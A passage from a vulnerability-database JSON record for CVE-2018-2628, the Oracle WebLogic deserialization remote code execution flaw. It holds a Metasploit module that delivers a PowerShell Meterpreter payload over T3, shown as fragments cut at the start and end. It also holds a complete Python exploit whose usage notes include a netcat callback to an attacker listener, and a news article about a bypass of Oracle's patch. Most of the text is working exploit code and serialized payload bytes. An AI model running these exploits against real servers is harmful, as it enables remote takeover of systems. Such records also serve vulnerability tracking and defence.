'70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\n @resp << '673badd256e7e91d7b470200007078700000000174'\n\n @resp << mycmd\n\n @resp << '74'\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\n @resp << '7e005a'\n end\n\n def on_client_connect(client)\n # Make sure to only sent one meterpreter payload to a host.\n # During testing the remote host called back up to 11 times\n # (or as long as the server was listening).\n vprint_status(\"Comparing host: #{client.peerhost}\")\n if @met_sent.include?(client.peerhost) then return end\n @met_sent << client.peerhost\n\n vprint_status(\"Sending payload to client: #{client.peerhost}\")\n\n # Response format determined by watching network traffic\n # generated by EDB PoC\n accept_conn = '4e00'\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\n accept_conn << raccept_conn\n accept_conn << '0000'\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\n\n client.put([accept_conn].pack('H*'))\n client.put([@resp].pack('H*'))\n end\n\n def t3_handshake\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_t3_request_object\n # data block is from EDB PoC\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\n data << '2d4147444d565155423154362e656883348cd6000000070000'\n\n data << rport.to_s(16).rjust(4, '0')\n\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\n data << '863d1d0000000078'\n\n sock.put([data].pack('H*'))\n sleep(2)\n sock.get_once\n end\n\n def send_payload_objdata\n # JRMPClient2 payload generated from EDB PoC:\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\n # Patch in srvhost and srvport\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\n payload << '78707702000078fe010000'\n\n # Data\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\n payload << '1e030000787077'\n\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\n unicast_dat = '000a556e696361737452656600'\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\n unicast_dat << unicast_srvhost\n unicast_dat << '0000'\n unicast_dat << srvport.to_s(16).rjust(4,'0')\n unicast_dat << '000000004e18654b000000000000000000000000000000'\n unicast_dat << '78'\n\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\n payload << unicast_dat\n\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\n payload << '6f3b290000001b7878fe00ff'\n\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\n data << payload\n\n sock.put([data].pack('H*'))\n sleep(1)\n sock.put([data].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def exploit\n @met_sent = []\n gen_resp\n\n connect\n vprint_status('Sending handshake...')\n t3_handshake\n\n build_t3_request_object\n\n start_service\n\n print_status('Sending client object payload...')\n send_payload_objdata\n\n # Need to wait this long to make sure we get a shell back\n sleep(10)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution", "edition": 1, "published": "2018-04-22T00:00:00", "title": "Oracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-04-22T00:00:00", "id": "EXPLOITPACK:4E686858C529C5DA732FBC1E25A496DB", "href": "", "sourceData": "# -*- coding: utf-8 -*-\n# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)\n#\n# IMPORTANT: Is provided only for educational or information purposes.\n#\n# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team\n# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA\n#\n# How to exploit:\n# 1. run below command on JRMPListener host\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\n# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\n# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'\n# 2. start a listener on attacker host\n# e.g. nc -nlvp 4040\n# 3. run this script on attacker host\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\n# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\n# e.g.\n# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)\n# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)\n\nfrom __future__ import print_function\n\nimport binascii\nimport os\nimport socket\nimport sys\nimport time\n\n\ndef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\n #generates ysoserial payload\n command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)\n print(\"command: \" + command)\n os.system(command)\n bin_file = open('payload.out','rb').read()\n return binascii.hexlify(bin_file)\n\n\ndef t3_handshake(sock, server_addr):\n sock.connect(server_addr)\n sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))\n time.sleep(1)\n sock.recv(1024)\n print('handshake successful')\n\n\ndef build_t3_request_object(sock, port):\n data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\n data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))\n data3 = '1a7727000d3234322e323134'\n data4 = '2e312e32353461863d1d0000000078'\n for d in [data1,data2,data3,data4]:\n sock.send(d.decode('hex'))\n time.sleep(2)\n print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))\n\n\ndef send_payload_objdata(sock, data):\n payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'\n payload+=data\n payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'\n payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)\n sock.send(payload.decode('hex'))\n time.sleep(2)\n sock.send(payload.decode('hex'))\n res = ''\n try:\n while True:\n res += sock.recv(4096)\n time.sleep(0.1)\n except Exception:\n pass\n return res\n\n\ndef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(65)\n server_addr = (dip, dport)\n t3_handshake(sock, server_addr)\n build_t3_request_object(sock, dport)\n payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\n print(\"payload: \" + payload)\n rs=send_payload_objdata(sock, payload)\n print('response: ' + rs)\n print('exploit completed!')\n\n\nif __name__==\"__main__\":\n #check for args, print usage if incorrect\n if len(sys.argv) != 7:\n print('\\nUsage:\\nexploit.py [victim ip] [victim port] [path to ysoserial] '\n '[JRMPListener ip] [JRMPListener port] [JRMPClient]\\n')\n sys.exit()\n\n dip = sys.argv[1]\n dport = int(sys.argv[2])\n path_ysoserial = sys.argv[3]\n jrmp_listener_ip = sys.argv[4]\n jrmp_listener_port = sys.argv[5]\n jrmp_client = sys.argv[6]\n exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-05-06T20:36:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-2628"], "description": "[![oracle-weblogic-server-deserialization-remote-command-execution](https://1.bp.blogspot.com/-9J8Q80vtoRQ/WucbFOd4joI/AAAAAAAAweI/PzSpfD_3wXQWLKjTW_qEpQzFlHTrd9QigCLcBGAs/s728-e20/oracle-weblogic-server-deserialization-remote-command-execution.png)](<https://1.bp.blogspot.com/-9J8Q80vtoRQ/WucbFOd4joI/AAAAAAAAweI/PzSpfD_3wXQWLKjTW_qEpQzFlHTrd9QigCLcBGAs/s728-e20/oracle-weblogic-server-deserialization-remote-command-execution.png>)\n\nEarlier this month, Oracle [patched](<http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html>) a highly critical Java deserialization remote code execution vulnerability in its WebLogic Server component of Fusion Middleware that could allow attackers to easily gain complete control of a vulnerable server. \n \nHowever, a security researcher, who operates through the Twitter handle @pyn3rd and claims to be part of the Alibaba security team, has now [found](<https://twitter.com/pyn3rd/status/990114565219344384>) a way using which attackers can bypass the security patch and exploit the WebLogic vulnerability once again. \n\n\n \nWebLogic Server acts as a middle layer between the front end user interface and the backend database of a multi-tier enterprise application. It provides a complete set of services for all components and handles details of the application behavior automatically. \n \nInitially discovered in November last year by [Liao Xinxi](<https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA>) of NSFOCUS security team, the Oracle WebLogic Server flaw (CVE-2018-2628) can be exploited with network access over TCP port 7001. \n\n\nIf exploited successfully, the flaw could allow a remote attacker to completely take over a vulnerable Oracle WebLogic Server. The vulnerability affects versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. \n \nSince a proof-of-concept ([PoC](<https://github.com/brianwrf/CVE-2018-2628>)) exploit for the original Oracle WebLogic Server vulnerability has already been made public on Github and someone has just bypassed the patch as well, your up-to-date services are again at risk of being hacked. \n\n\n \nAlthough @pyn3rd has only released a short GIF (video) as a proof-of-concept (PoC) instead of releasing full bypass code or any technical details, it would hardly take a few hours or days for skilled hackers to figure out a way to achieve same. \n \nCurrently, it is unclear when Oracle would release a new security update to address this issue that has re-opened CVE-2018-2628 flaw. \n \nIn order to be at least one-step safer, it is still advisable to install April patch update released by Oracle, if you haven't yet because attackers have already [started scanning](<https://twitter.com/GreyNoiseIO/status/988685136035307520>) the Internet for vulnerable WebLogic servers.\n", "modified": "2018-04-30T13:39:31", "published": "2018-04-30T02:36:00", "id": "THN:B899834FCFF1D593C20E11F19F0E6769", "href": "https://thehackernews.com/2018/04/oracle-weblogic-rce-exploit.html", "type": "thn", "title": "Faulty Patch for Oracle WebLogic Flaw Opens Updated Servers to Hackers Again", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-08-11T09:54:16", "description": "", "published": "2018-08-10T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-10T00:00:00", "id": "PACKETSTORM:148878", "href": "https://packetstormsecurity.com/files/148878/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/powershell' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::TcpServer \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server Deserialization RCE', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic \nServer T3 interface can send a serialized object to the interface to \nexecute code on vulnerable hosts. \n}, \n'Author' => \n[ \n'brianwrf', # EDB PoC \n'Jacob Robles' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2018-2628'], \n['EDB', '44553'] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => ['win'] \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'RPORT' => 7001 \n}, \n'DisclosureDate' => 'Apr 17 2018')) \nend \n \ndef gen_resp \npwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first) \npwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\") \ntmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join \n \nmycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0') \nmycmd << tmp_dat \n \n# Response data taken from JRMPListener generated data: \n# java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe' \n# Modified captured network traffic bytes. Patch in command to run \n@resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e' \n@resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045' \n@resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176' \n@resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863' \n@resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e' \n@resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c' \n@resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573' \n@resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163' \n@resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545' \n@resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400' \n@resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c' \n@resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c' \n@resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163' \n@resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e' \n@resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669' \n@resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870' \n@resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973' \n@resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361' \n@resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361' \n@resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e' \n@resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e' \n@resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973' \n@resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176' \n@resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543' \n@resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661' \n@resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469' \n@resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870' \n@resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374' \n@resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e' \n@resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565' \n@resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61' \n@resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574' \n@resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176' \n@resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c' \n@resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174' \n@resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163' \n@resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d' \n@resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61' \n@resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366' \n@resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f' \n@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675' \n@resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97' \n@resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061' \n@resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72' \n@resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f' \n@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472' \n@resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d' \n@resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d' \n@resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461' \n@resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73' \n@resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672' \n@resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078' \n@resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469' \n@resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287' \n@resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67' \n@resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950' \n@resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400' \n@resp << 